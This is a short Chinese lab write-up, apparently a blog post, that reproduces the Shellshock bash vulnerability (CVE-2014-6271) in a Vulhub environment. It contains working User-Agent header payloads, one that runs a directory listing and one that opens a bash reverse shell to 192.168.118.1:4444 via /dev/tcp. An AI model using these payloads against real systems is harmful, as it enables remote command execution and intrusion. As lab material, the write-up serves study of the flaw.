vulhub漏洞复现之bash(Shellshock CVE-2014-6271)

Shellshock 破壳漏洞 CVE-2014-6271

1.漏洞概述:
GNU Bash 4.3及之前版本在评估某些构造的环境变量时存在安全漏洞,向环境变量值内的函数定义后添加多余的字符串会触发此漏洞,攻击者可利用此漏洞改变或绕过环境限制,以执行shell命令。某些服务和应用允许未经身份验证的远程攻击者提供环境变量以利用此漏洞。此漏洞源于在调用bash shell之前可以用构造的值创建环境变量。这些变量可以包含代码,在shell被调用后会被立即执行。
2.漏洞影响:GNU Bash <= 4.3
3.漏洞复现:
Vulhub搭建靶场,
在这里插入图片描述

进入靶场
在这里插入图片描述

通过bp抓包,修改User-Agent,
User-Agent: () { :;};echo ; echo; echo $(/bin/ls /);
在这里插入图片描述

反弹shell来一个。还是修改User-Agent:() { :; }; /bin/bash -i >& /dev/tcp/192.168.118.1/4444 0>&1;
nc监听,反弹成功

在这里插入图片描述

评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值